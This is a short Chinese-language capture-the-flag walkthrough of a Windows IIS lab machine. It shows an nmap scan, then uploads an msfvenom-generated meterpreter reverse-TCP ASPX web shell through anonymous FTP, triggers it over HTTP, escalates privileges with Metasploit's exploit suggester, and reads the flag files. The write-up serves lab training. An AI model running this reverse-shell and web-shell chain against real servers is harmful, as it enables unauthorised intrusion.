基本信息

端口扫描

21和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ nmap -sC -sV 10.10.10.5
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-01 14:23 CST
Nmap scan report for 10.10.10.5
Host is up (0.079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 12-03-20 07:18PM 2829 1.aspx
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
| 12-03-20 08:10PM 38857 shell.asp
| 12-03-20 08:17PM 38443 shell.aspx
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.90 seconds

80

IIS默认页面:

21 ftp

ftp可以匿名访问,就直接是80的web,aspx是别人传的:

FTP getshell

那就是直接FTP写webshell,直接msf生成就可以:

1
msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o miao.aspx LHOST=10.10.14.12 LPORT=4444

FTP上传之后去80的web访问触发,得到web用户shell:

提权

直接运行msf的提权建议模块:

1
post/multi/recon/local_exploit_suggester

给出很多建议,随意选一个就可以:

exp打到system shell:

flags

然后直接去读取user.txt和root.txt就可以:

1
2
type c:\Users\babis\Desktop\user.txt.txt
type c:\Users\Administrator\Desktop\root.txt.txt

参考资料